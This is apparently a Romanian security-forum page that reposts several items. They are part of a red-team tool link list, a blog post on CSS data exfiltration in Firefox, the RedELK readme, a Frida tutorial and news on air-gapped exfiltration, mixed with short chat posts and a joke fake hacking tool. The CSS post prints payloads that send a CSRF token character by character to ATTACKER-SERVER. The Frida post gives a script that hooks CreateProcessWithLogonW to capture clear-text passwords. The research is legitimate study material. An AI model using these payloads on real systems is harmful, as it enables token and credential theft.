Subsriptions. https://github.com/Sw4mpf0x/PowerLurk DAMP The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.https://github.com/HarmJ0y/DAMP Escalate Privileges Domain Escalation PowerView is a PowerShell tool to gain network situational awareness on Windows domains. https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 Get-GPPPassword Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured. https://github.com/fox-it/Invoke-ACLPwn BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. https://github.com/BloodHoundAD/BloodHound PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek Grouper a PowerShell script for helping to find vulnerable settings in AD Group Policy. https://github.com/l0ss/Grouper ADRecon is a tool which extracts various artifacts (as highlighted below) out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis. https://github.com/sense-of-security/ADRecon ADACLScanner one script for ACL's in Active Directory. https://github.com/canix1/ADACLScanner ACLight a useful script for advanced discovery of Domain Privileged Accounts that could be targeted - including Shadow Admins. https://github.com/cyberark/ACLight LAPSToolkit a tool to audit and attack LAPS environments. https://github.com/leoloobeek/LAPSToolkit PingCastle is a free, Windows-based utility to audit the risk level of your AD infrastructure and check for vulnerable practices. https://www.pingcastle.com/download RiskySPNs is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). https://github.com/cyberark/RiskySPN Mystique is a PowerShell tool to play with Kerberos S4U extensions, this module can assist blue teams to identify risky Kerberos delegation configurations as well as red teams to impersonate arbitrary users by leveraging KCD with Protocol Transition. https://github.com/machosec/Mystique Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project. https://github.com/GhostPack/Rubeus kekeo is a little toolbox I have started to manipulate Microsoft Kerberos in C (and for fun). https://github.com/gentilkiwi/kekeo Local Escalation UACMe is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. https://github.com/hfiref0x/UACME windows-kernel-exploits a collection windows kernel exploit. https://github.com/SecWiki/windows-kernel-exploits PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload. https://github.com/rsmudge/ElevateKit Sherlock a powerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.https://github.com/rasta-mouse/Sherlock Tokenvator a tool to elevate privilege with Windows Tokens. https://github.com/0xbadjuju/Tokenvator Data Exfiltration CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight; Evade DLP/MLS Devices; Social Engineering of Analysts; Defeat Data Whitelisting Controls; Evade AV Detection. https://github.com/TryCatchHCF/Cloakify DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time. https://github.com/sensepost/DET DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel. https://github.com/Arno0x/DNSExfiltrator PyExfil a Python Package for Data Exfiltration. https://github.com/ytisf/PyExfil Egress-Assess is a tool used to test egress data detection capabilities. https://github.com/ChrisTruncer/Egress-Assess Powershell RAT python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. https://github.com/Viralmaniar/Powershell-RAT Misc Wireless Networks Wifiphisher is a security tool that performs Wi-Fi automatic association attacks to force wireless clients to unknowingly connect to an attacker-controlled Access Point. https://github.com/wifiphisher/wifiphisher Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. https://github.com/kgretzky/evilginx mana toolkit for wifi rogue AP attacks and MitM. https://github.com/sensepost/mana Embedded & Peripheral Devices Hacking magspoof a portable device that can spoof/emulate any magnetic stripe, credit card or hotel card "wirelessly", even on standard magstripe (non-NFC/RFID) readers. https://github.com/samyk/magspoof WarBerryPi was built to be used as a hardware implant during red teaming scenarios where we want to obtain as much information as possible in a short period of time with being as stealth as possible. https://github.com/secgroundzero/warberry P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). https://github.com/mame82/P4wnP1 malusb HID spoofing multi-OS payload for Teensy. https://github.com/ebursztein/malusb Fenrir is a tool designed to be used "out-of-the-box" for penetration tests and offensive engagements. Its main feature and purpose is to bypass wired 802.1x protection and to give you an access to the target network. https://github.com/Orange-Cyberdefense/fenrir-ocd poisontap exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js. https://github.com/samyk/poisontap WHID WiFi HID Injector - An USB Rubberducky / BadUSB On Steroids. https://github.com/whid-injector/WHID Software For Team Communication RocketChat is free, unlimited and open source. Replace email & Slack with the ultimate team chat software solution. https://rocket.chat Etherpad is an open source, web-based collaborative real-time editor, allowing authors to simultaneously edit a text document https://etherpad.net Log Aggregation RedELK Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations. https://github.com/outflanknl/RedELK/ CobaltSplunk Splunk Dashboard for CobaltStrike logs. https://github.com/vysec/CobaltSplunk Red Team Telemetry A collection of scripts and configurations to enable centralized logging of red team infrastructure. https://github.com/ztgrace/red_team_telemetry Elastic for Red Teaming Repository of resources for configuring a Red Team SIEM using Elastic. https://github.com/SecurityRiskAdvisors/RedTeamSIEM C# Offensive Framework SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers. https://github.com/cobbr/SharpSploit GhostPack is (currently) a collection various C# implementations of previous PowerShell functionality, and includes six separate toolsets being released today- Seatbelt, SharpUp, SharpRoast, SharpDump, SafetyKatz, and SharpWMI. https://github.com/GhostPack SharpWeb .NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge. https://github.com/djhohnstein/SharpWeb reconerator C# Targeted Attack Reconnissance Tools. https://github.com/stufus/reconerator SharpView C# implementation of harmj0y's PowerView. https://github.com/tevora-threat/SharpView Watson is a (.NET 2.0 compliant) C# implementation of Sherlock. https://github.com/rasta-mouse/Watson Labs Detection Lab This lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. https://github.com/clong/DetectionLab Modern Windows Attacks and Defense Lab This is the lab configuration for the Modern Windows Attacks and Defense class that Sean Metcalf (@pyrotek3) and I teach. https://github.com/jaredhaight/WindowsAttackAndDefenseLab Invoke-UserSimulator Simulates common user behaviour on local and remote Windows hosts. https://github.com/ubeeri/Invoke-UserSimulator Invoke-ADLabDeployer Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams. https://github.com/outflanknl/Invoke-ADLabDeployer Sheepl Creating realistic user behaviour for supporting tradecraft development within lab environments. https://github.com/SpiderLabs/sheepl Scripts Aggressor Scripts is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots. https://github.com/invokethreatguy/CSASC https://github.com/secgroundzero/CS-Aggressor-Scripts https://github.com/Und3rf10w/Aggressor-scripts https://github.com/harleyQu1nn/AggressorScripts https://github.com/rasta-mouse/Aggressor-Script https://github.com/RhinoSecurityLabs/Aggressor-Scripts https://github.com/bluscreenofjeff/AggressorScripts https://github.com/001SPARTaN/aggressor_scripts https://github.com/360-A-Team/CobaltStrike-Toolset A collection scripts useful for red teaming and pentesting https://github.com/FuzzySecurity/PowerShell-Suite https://github.com/nettitude/Powershell https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts https://github.com/threatexpress/red-team-scripts https://github.com/SadProcessor/SomeStuff https://github.com/rvrsh3ll/Misc-Powershell-Scripts https://github.com/enigma0x3/Misc-PowerShell-Stuff https://github.com/ChrisTruncer/PenTestScripts https://github.com/bluscreenofjeff/Scripts https://github.com/xorrior/RandomPS-Scripts https://github.com/xorrior/Random-CSharpTools https://github.com/leechristensen/Random https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/social-engineering References MITRE’s ATT&CK™ is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. https://attack.mitre.org/wiki/Main_Page Cheat Sheets for various projects (Beacon/Cobalt Strike,PowerView, PowerUp, Empire, and PowerSploit). https://github.com/HarmJ0y/CheatSheets PRE-ATT&CK Adversarial Tactics, Techniques & Common Knowledge for Left-of-Exploit. https://attack.mitre.org/pre-attack/index.php/Main_Page Adversary OPSEC consists of the use of various technologies or 3rd party services to obfuscate, hide, or blend in with accepted network traffic or system behavior. https://attack.mitre.org/pre-attack/index.php/Adversary_OPSEC Adversary Emulation Plans To showcase the practical use of ATT&CK for offensive operators and defenders, MITRE created Adversary Emulation Plans. https://attack.mitre.org/wiki/Adversary_Emulation_Plans Red-Team-Infrastructure-Wiki Wiki to collect Red Team infrastructure hardening resources. https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki Advanced Threat Tactics – Course and Notes This is a course on red team operations and adversary simulations. https://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes Red Team Tips as posted by @vysecurity on Twitter. https://vincentyiu.co.uk/red-team-tips Awesome Red Teaming List of Awesome Red Team / Red Teaming Resources. https://github.com/yeyintminthuhtut/Awesome-Red-Teaming ATT&CK for Enterprise Software is a generic term for custom or commercial code, operating system utilities, open-source software, or other tools used to conduct behavior modeled in ATT&CK. https://attack.mitre.org/wiki/Software Planning a Red Team exercise This document helps inform red team planning by contrasting against the very specific red team style described in Red Teams. https://github.com/magoo/redteam-plan Awesome Lockpicking a curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys. https://github.com/meitar/awesome-lockpicking Awesome Threat Intelligence a curated list of awesome Threat Intelligence resources. https://github.com/hslatman/awesome-threat-intelligence APT Notes Need some scenario? APTnotes is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets. https://github.com/aptnotes/data TIBER-EU FRAMEWORK The European Framework for Threat Intelligence-based Ethical Red Teaming (TIBER-EU), which is the first Europe-wide framework for controlled and bespoke tests against cyber attacks in the financial market. http://www.ecb.europa.eu/pub/pdf/other/ecb.tiber_eu_framework.en.pdf CBEST Implementation Guide CBEST is a framework to deliver controlled, bespoke, intelligence-led cyber security tests. The tests replicate behaviours of threa actors, assessed by the UK Government and commercial intelligence providers as posing a genuine threat to systemically important financial institutions. https://www.crest-approved.org/wp-content/uploads/2014/07/CBEST-Implementation-Guide.pdf Red Team: Adversarial Attack Simulation Exercise Guidelines for the Financial Industry in Singapore The Association of Banks in Singapore (ABS), with support from the Monetary Authority of Singapore (MAS), has developed a set of cybersecurity assessment guidelines today to strengthen the cyber resilience of the financial sector in Singapore. Known as the Adversarial Attack Simulation Exercises (AASE) Guidelines or “Red Teaming” Guidelines, the Guidelines provide financial institutions (FIs) with best practices and guidance on planning and conducting Red Teaming exercises to enhance their security testing. https://abs.org.sg/docs/library/abs-red-team-adversarial-attack-simulation-exercises-guidelines-v1-06766a69f299c69658b7dff00006ed795.pdf Sursa: https://0xsp.com/offensive/red-teaming-toolkit-collection

CSS data exfiltration in Firefox via a single injection point Michał Bentkowski | February 12, 2020 | Research A few months ago I identified a security issue in Firefox known as CVE-2019-17016. During analysis of the issue, I’ve come up with a new technique of CSS data exfiltration in Firefox via a single injection point which I’m going to share in this blog post. Basics and prior art For the sake of the examples, we assume that we want to leak CSRF token from <input> element. <input type="hidden" name="csrftoken" value="SOME_VALUE"> 1 <input type="hidden" name="csrftoken" value="SOME_VALUE"> We cannot use scripts (perhaps because of CSP), so we need to settle for style injection. The classic way is to use attribute selectors, for instance: input[name='csrftoken'][value^='a'] { background: url(//ATTACKER-SERVER/leak/a); } input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); } ... input[name='csrftoken'][value^='z'] { background: url(//ATTACKER-SERVER/leak/z); } 1 2 3 4 5 6 7 8 9 10 11 12 13 input[name='csrftoken'][value^='a'] { background: url(//ATTACKER-SERVER/leak/a); } input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); } ... input[name='csrftoken'][value^='z'] { background: url(//ATTACKER-SERVER/leak/z); } If the CSS rule is applied, then the attacker gets an HTTP request, leaking the first character of the token. Then, another stylesheet needs to be prepared that includes the first known character, for instance: input[name='csrftoken'][value^='aa'] { background: url(//ATTACKER-SERVER/leak/aa); } input[name='csrftoken'][value^='ab'] { background: url(//ATTACKER-SERVER/leak/ab); } ... input[name='csrftoken'][value^='az'] { background: url(//ATTACKER-SERVER/leak/az); } 1 2 3 4 5 6 7 8 9 10 11 12 13 input[name='csrftoken'][value^='aa'] { background: url(//ATTACKER-SERVER/leak/aa); } input[name='csrftoken'][value^='ab'] { background: url(//ATTACKER-SERVER/leak/ab); } ... input[name='csrftoken'][value^='az'] { background: url(//ATTACKER-SERVER/leak/az); } It was usually assumed that subsequent stylesheets need to be provided via reloading the page that is loaded in an <iframe>. In 2018 Pepe Vila had an amazing concept that we can achieve the same in Chrome with a single injection point by abusing CSS recursive imports. The same trick was rediscovered in 2019 by Nathanial Lattimer (aka @d0nutptr), however with a slight variation. I’ll summarize Lattimer’s approach below because it is closer to what I’ve come up with in Firefox, even though (what’s pretty funny) I wasn’t aware of Lattimer’s research when doing my own one. So one can say that I rediscovered a rediscovery… 🙂 In a nutshell, the first injection is a bunch of imports: @import url(//ATTACKER-SERVER/polling?len=0); @import url(//ATTACKER-SERVER/polling?len=1); @import url(//ATTACKER-SERVER/polling?len=2); ... 1 2 3 4 @import url(//ATTACKER-SERVER/polling?len=0); @import url(//ATTACKER-SERVER/polling?len=1); @import url(//ATTACKER-SERVER/polling?len=2); ... Then the idea is as follows: In the beginning only the first @import returns a stylesheet; the other ones just block the connection, The first @import returns a stylesheet that leaks the 1st character of the token, When the leak of the 1st character reaches the ATTACKER-SERVER, the 2nd import stops blocking and returns a stylesheet that includes the 1st character and attempts to leak the 2nd one, When the leak of the 2nd character reaches the ATTACKER-SERVER, the 3rd import stop blocking… and so on. The technique works because Chrome processes imports asynchronously, so when any import stops blocking, Chrome immediately parses it and applies it. Firefox and stylesheet processing The method from previous paragraph doesn’t work in Firefox at all because of significant differences in processing of stylesheets in comparison to Chrome. I’ll explain the differences on a few simple examples. First of all, Firefox processes stylesheets synchronously. So when there are multiple imports in a stylesheet, Firefox won’t apply any CSS rules until all of the imports are processed. Consider the following example: <style> @import '/polling/0'; @import '/polling/1'; @import '/polling/2'; </style> 1 2 3 4 5 <style> @import '/polling/0'; @import '/polling/1'; @import '/polling/2'; </style> Assume that the first @import returns a CSS rule that sets the background of the page to blue while the next imports are blocking (i.e. they never return anything, hanging the HTTP connection). In Chrome, the page would turn blue immediately. In Firefox, nothing happens. The problem can be circumvented by placing all imports in separate <style> elements: <style>@import '/polling/0';</style> <style>@import '/polling/1';</style> <style>@import '/polling/2';</style> 1 2 3 <style>@import '/polling/0';</style> <style>@import '/polling/1';</style> <style>@import '/polling/2';</style> In the case above, Firefox treats all stylesheets separately, so the page turns blue instantly and the other imports are processed in the background. But then there’s another problem. Let’s say that we want to steal a token with 10 characters: <style>@import '/polling/0';</style> <style>@import '/polling/1';</style> <style>@import '/polling/2';</style> ... <style>@import '/polling/10';</style> 1 2 3 4 5 <style>@import '/polling/0';</style> <style>@import '/polling/1';</style> <style>@import '/polling/2';</style> ... <style>@import '/polling/10';</style> Firefox would immediately queue all 10 imports. After processing the first import, Firefox would queue another request with character leak. The problem is that this request is put at the end of the queue and by default the browser has a limit of 6 concurrent connections to a single server. So the request with the leak would never reach the server as there are 6 other blocking connections to the server and we’re going to have a dead-lock. HTTP/2 to the rescue! The limit of 6 connections is enforced on TCP layer. So there can be only 6 simultaneous TCP connections to a single server. At this point I had an idea that HTTP/2 could be the solution. If you’re not aware of benefits brought by HTTP/2, one of its main selling points is that you can send multiple HTTP requests over a single connection (known as multiplexing) which increases the performance greatly. Firefox has a limit of concurrent requests on a single HTTP/2 connection too but by default it is 100 (network.http.spdy.default-concurrent in about:config). If we need more, we can force Firefox to create a second TCP connection by using a different host name. For instance, if I create 100 requests to https://localhost:3000 and 50 requests to https://127.0.0.1:3000, Firefox would create two TCP connections. Exploit Now I have all the building blocks needed to prepare a working exploit. Here’s key assumptions: The exploit code would be served over HTTP/2. Endpoint /polling/:session/:index returns a CSS to leak :index-th character. The request would block unless index-1 characters were already leaked. :session path parameter is used to distinguish various exfiltration attempts. Endpoint /leak/:session/:value is used to leak a token. :value would be the whole value leaked, not just the last character. To force Firefox to make two TCP connections one endpoint would be reached via https://localhost:3000 and the other one via https://127.0.0.1:3000. Endpoint /generate is used to generate a sample code. I’ve created a testbed in which the goal is to steal the csrftoken via data exfiltration. You can access it directly here. Testbed screenshot I’ve hosted the proof-of-concept on GitHub, and below is a videocast showing that it works: What’s interesting is that because of HTTP/2 the exploit is blazingly fast; it took less than three seconds to leak the entire token. Summary In the article I’ve shown that you can leak data via CSS if you have a single injection point and you don’t want to reload the page. This is possible thanks to two features: @import rules need to be separated to many stylesheets so that subsequent imports don’t block processing of the entire stylesheet. To get around the limit of concurrent TCP connections, the exploit needs to be served over HTTP/2. Author: Michał Bentkowski Sursa: https://research.securitum.com/css-data-exfiltration-in-firefox-via-single-injection-point/

Red Team's SIEM - tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability for the Red Team in long term operations. As presented and demonstrated at the following conferences: BruCon 2018 video and slides x33fcon 2019 video and slides Hack in Paris 2019 video and slides Goal of the project Short: a Red Team's SIEM. Longer: a Red Team's SIEM that serves two goals: Enhanced usability and overview for the red team operators by creating a central location where all relevant operational logs from multiple teamservers are collected and enriched. This is great for historic searching within the operation as well as giving a read-only view on the operation (e.g. for the White Team). Especially useful for multi-scenario, multi-teamserver, multi-member and multi-month operations. Also, super easy ways for viewing all screenshots, IOCs, keystrokes output, etc. \o/ Spot the Blue Team by having a central location where all traffic logs from redirectors are collected and enriched. Using specific queries its now possible to detect that the Blue Team is investigating your infrastructure. Here's a conceptual overview of how RedELK works. Authors and contribution This project is developed and maintained by: Marc Smeets (@MarcOverIP on Github and Twitter) Mark Bergman (@xychix on Github and Twitter) We welcome contributions! Contributions can be both in code, as well as in ideas you might have for further development, alarms, usability improvements, etc. Current state and features on todo-list This project is still in beta phase. This means that it works on our machines and our environment, but no extended testing is performed on different setups. This also means that naming and structure of the code is still subject to change. We are working (and you are invited to contribute) on many things, amongst others: Support for other redirector applications. E.g. Nginx. Fully tested and working filebeat and logstash configuration. Support for other C2 frameworks. E.g. FactionC2, Covenant, Empire. Fully tested and working filebeat and logstash configurations please. Ingest manual IOC data. When you are uploading a document, or something else, outside of Cobalt Strike, it will not be included in the IOC list. We want an easy way to have these manual IOCs also included. One way would be to enter the data manually in the activity log of Cobalt Strike and have a logstash filter to scrape the info from there. Ingest e-mails. Create input and filter rules for IMAP mailboxes. This way, we can use the same easy ELK interface for having an overview of sent emails, and replies. DNS traffic analyses. Ingest, filter and query for suspicious activities on the DNS level. This will take considerable work due to the large amount of noise/bogus DNS queries performed by scanners and online DNS inventory services. Other alarm channels. Think Slack, Telegram, whatever other way you want for receiving alarms. Fine grained authorisation. Possibility for blocking certain views, searches, and dashboards, or masking certain details in some views. Useful for situations where you don't want to give out all information to all visitors. Sursa: https://github.com/outflanknl/RedELK

Hooking CreateProcessWithLogonW with Frida 2 minute read Introduction Following b33f most recent Patreon session titled RDP hooking from POC to PWN where he talks about API hooking in general and then discuss in details RDP hooking (RdpThief) research published in 2019 by @0x09AL, I’ve decided to learn more about the subject as it seemed intriguing from an offensive research standpoint. In essence, API hooking is the process by which we can intercept and potentially modify the behavior and flow of API calls. In this blog we will be looking at capturing data pertaining to API calls for the most part. Tooling We will be using the following tools: API Monitor tool which is a free software that lets you monitor and control API calls made by applications and services according to the website. Fermion wrapper for Frida or frida-node rather exposing the ability to inject Frida scripts into processes using a single UI. Target While reading through chapter 3 of Windows Internals book, I noticed a mention of the CreateProcessWithLogonW API which could be used by programs and/or utilities that offer execution in the context of a different user such as runas command-line utility. Moreover, examining this function API documentation on MSDN I found that it takes clear-text password for a given user account as parameter amongest others which makes it even more interesting. At this point I thought this is something worth exploring and started targeting commands that make use of said API. The following is list of few commands I tested: Start As the name suggest, the start command enables a user to open a separate window from the Windows command line. Let’s execute the below command to spawn command prompt as a different user while running API Monitor in the background. We notice call to CreateProcessWithLogonW API which holds the credential values we just entered in the first and second parameters. Start-Process The Start-Process cmdlet starts one or more processes on the local computer such as starting process using alternate credentials amongest other things. Again we search for call to CreateProcessWithLogonW API and examine the parameters as shown below. Start-Job The last cmdlet we’re going to test is Start-Job which is used to run jobs in the background. In this case, we’re going to invoke basic powershell script to mix things up. $username = "lowpriv" $password = "Passw0rd!" $securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force $Creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $securePassword) Start-Job -ScriptBlock {Get-Process Explorer} -Credential $Creds And we get the same result. Frida Script I’ve put together basic Frida script that hooks the CreateProcessWithLogonW API and then extract clear-text credentials. // This script extract clear-text passwords by hooking CreateProcessWithLogonW function API. //------------------------------------------------------------------------------------------ // https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithlogonw var pCreateProcessWithLogonW = Module.findExportByName("Advapi32.dll", 'CreateProcessWithLogonW') Interceptor.attach(pCreateProcessWithLogonW, { onEnter: function (args) { send("[+] CreateProcessWithLogonW API hooked!"); // Save the following arguments for OnLeave this.lpUsername = args[0]; this.lpDomain = args[1]; this.lpPassword = args[2]; this.lpApplicationName = args[4]; this.lpCommandLine =args[5]; }, onLeave: function (args) { send("[+] Retrieving argument values.."); send("============================="); send("Username : " + this.lpUsername.readUtf16String()); send("Domain : " + this.lpDomain.readUtf16String()); send("Password : " + this.lpPassword.readUtf16String()); send("Application : " + this.lpApplicationName.readUtf16String()); send("Commandline : " + this.lpCommandLine.readUtf16String()); send("============================="); } }); Let’s test it. Conclusion I believe this post serves as a gentle introduction to API hooking and I’m sure I missed a few other commands that make use of CreateProcessWithLogonW API behind the scenes ;D. I don’t know wether this is useful from post-exploitation standpoint and would rather leave it to the reader to decide. Lastly, I would like to thank @h0mbre_ for reviewing this post and hope it was a good read. Updated: February 22, 2020 Hashim Jawad I hack stuff and like falafel. Twitter GitHub Sursa: https://ihack4falafel.github.io/Hooking-CreateProcessWithLogonW-with-Frida/

Ar fi frumos sa iti traga fibra in casa. Acel router de la ei pare sa aiba porturi Ethenet de 100Mbps, nu Gigabit... Suna si vorbeste referitor la asta. Oricum, in principiu e de ajuns, eu nu am mai descarcat ceva de pe torrente de mult timp si era singura utilitate a unui net de 10MBps+.

Am dezvoltat o aplicatie pentru hackeri, dar nu o pot publica deoarece ar afecta tot Internetul... ./nytro --exploit https://nasa.gov Hacking in progres... Got access to admin panel: admin : WeWereNotReallyOnTheMoon@Fake Got root! ssh root@nasa.gov... root@nasa.gov:/ ./nytro --hack-facebook https://facebook.com/profile/MarkZukuBergu Hacking in progress... Got account password: IAmZaBossOfZaMoney2020 ./nytro --hack-my-firend Gigel Hacking in progress... Finding home address: Str. Tuicii, Nr. 2, Casa 3 Finding naked pictures... Holy shit, you don't want to see them... Este foarte periculoasa. Desi unii nu o sa creada, este mai pericoloasa chiar si decat Coailii v10.

Da, stirea legata de CryptoAG am vazut ca e veche si probabil e recirculata, fara prea multe verificari. Gen "Ambulanta neagra care fura copii" daca sunteti familiari cu stirile din spatiul public romanesc. Legat de "Man in The Middle", nu cred ca asta era problema in acest caz. Nu am citit detalii tehnice despre ce s-a intamplat, insa eu ma gandesc la un "Master key" cu care aveau posibilitatea sa decrypteze ulterior date pe care le putea obtine prin orice metoda, chiar si pe hartie de exemplu. Chiar daca nu exista un "Master key" poate exista o problema care permitea un "bruteforce rapid" al datelor cryptate. Ma gandesc si eu, nu am idee.

Da, am vazut stirea, nu ma mira. Adica nu ar fi trebuit sa accepte orbeste o astfel de solutie, ceva reverse engineering pe ea si o echipa buna de crypto ar fi vazut ca e ceva in neregula

Una dintre aplicaţiile preinstalate pe telefoanele Samsung, descoperită trimiţând datele utilizatorilor unei companii chinezeşti Aurelian Mihai - 7 Feb 2020 Problemele pentru Samsung au apărut după ce o investigaţie a arătat că funcţia de curăţare a spaţiului de stocare de fişiere nedorite este implementată cu ajutorul unui software furnizat de o companie din China cu reputaţie dubioasă, Qihoo 360, cunoscută pentru practicile abuzive de colectare a datelor despre utilizatori, cu scopul vânzării acestora către companii de publicitate. În mod predictibil, vestea nu a fost bine primită de comunitatea Android, iar clarificările oferite de Samsung, cum că întreg procesul de scanare şi înlăturare a fişierelor junk este gestionat pe dispozitiv iar pe serverele Qihoo sunt încărcate doar informaţii generice, nu a mulţumit pe toată lumea. Pentru a elimina orice îndoieli rămase, Samsung a mers mai departe creând o actualizare de Android 10 care înlătură software-ul furnizat de Qihoo 360 de pe dispozitivele utilizatorilor, chiar dacă asta înseamnă şi dispariţia funcţiei respective din aplicaţia Device Care. Este de aşteptat ca Samsung să reintroducă funcţia de curăţare a fişierelor redundante cu o actualizare viitoare a aplicaţiei Device Care, folosind software dezvoltat de inginerii companiei sau comandat de la alt furnizor cu reputaţie ceva mai bună. Sursa: https://www.go4it.ro/aplicatii/una-dintre-aplicatiile-preinstalate-pe-telefoanele-samsung-descoperita-trimitand-datele-utilizatorilor-unei-companii-chinezesti-18808744/

Salut, sunt destule aplicatii care fac asta, nu cred ca e necesar unul nou. https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/

Exfiltrating Data from Air-Gapped Computers Using Screen Brightness February 05, 2020Mohit Kumar It may sound creepy and unreal, but hackers can also exfiltrate sensitive data from your computer by simply changing the brightness of the screen, new cybersecurity research shared with The Hacker News revealed. In recent years, several cybersecurity researchers demonstrated innovative ways to covertly exfiltrate data from a physically isolated air-gapped computer that can't connect wirelessly or physically with other computers or network devices. These clever ideas rely on exploiting little-noticed emissions of a computer's components, such as light, sound, heat, radio frequencies, or ultrasonic waves, and even using the current fluctuations in the power lines. For instance, potential attackers could sabotage supply chains to infect an air-gapped computer, but they can't always count on an insider to unknowingly carry a USB with the data back out of a targeted facility. When it comes to high-value targets, these unusual techniques, which may sound theoretical and useless to many, could play an important role in exfiltrating sensitive data from an infected but air-gapped computer. How Does the Brightness Air-Gapped Attack Work? In his latest research with fellow academics, Mordechai Guri, the head of the cybersecurity research center at Israel's Ben Gurion University, devised a new covert optical channel using which attackers can steal data from air-gapped computers without requiring network connectivity or physically contacting the devices. "This covert channel is invisible, and it works even while the user is working on the computer. Malware on a compromised computer can obtain sensitive data (e.g., files, images, encryption keys, and passwords), and modulate it within the screen brightness, invisible to users," the researchers said. The fundamental idea behind encoding and decoding of data is similar to the previous cases, i.e., malware encodes the collected information as a stream of bytes and then modulate it as '1' and '0' signal. In this case, the attacker uses small changes in the LCD screen brightness, which remains invisible to the naked eye, to covertly modulate binary information in morse-code like patterns "In LCD screens each pixel presents a combination of RGB colors which produce the required compound color. In the proposed modulation, the RGB color component of each pixel is slightly changed." "These changes are invisible, since they are relatively small and occur fast, up to the screen refresh rate. Moreover, the overall color change of the image on the screen is invisible to the user." The attacker, on the other hand, can collect this data stream using video recording of the compromised computer's display, taken by a local surveillance camera, smartphone camera, or a webcam and can then reconstruct exfiltrated information using image processing techniques. As shown in the video demonstration shared with The Hacker News, researchers infected an air-gapped computer with specialized malware that intercepts the screen buffer to modulate the data in ASK by modifying the brightness of the bitmap according to the current bit ('1' or '0'). You can find detailed technical information on this research in the paper [PDF] titled, 'BRIGHTNESS: Leaking Sensitive Data from Air-Gapped Workstations via Screen Brightness,' published yesterday by Mordechai Guri, Dima Bykhovsky and Yuval Elovici. Air-Gapped Popular Data Exfiltration Techniques It's not the first time Ben-Gurion researchers came up with a covert technique to target air-gapped computers. Their previous research of hacking air-gap machines include: PowerHammer attack to exfiltrate data from air-gapped computers through power lines. MOSQUITO technique using which two (or more) air-gapped PCs placed in the same room can covertly exchange data via ultrasonic waves. BeatCoin technique that could let attackers steal private encryption keys from air-gapped cryptocurrency wallets. aIR-Jumper attack that takes sensitive information from air-gapped computers with the help of infrared-equipped CCTV cameras that are used for night vision. MAGNETO and ODINI techniques use CPU-generated magnetic fields as a covert channel between air-gapped systems and nearby smartphones. USBee attack that can be used to steal data from air-gapped computers using radio frequency transmissions from USB connectors. DiskFiltration attack that can steal data using sound signals emitted from the hard disk drive (HDD) of the targeted air-gapped computer; BitWhisper that relies on heat exchange between two computer systems to stealthily siphon passwords or security keys; AirHopper that turns a computer's video card into an FM transmitter to capture keystrokes; Fansmitter technique that uses noise emitted by a computer fan to transmit data; and GSMem attack that relies on cellular frequencies. Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group. Sursa: https://thehackernews.com/2020/02/hacking-air-gapped-computers.html?m=1

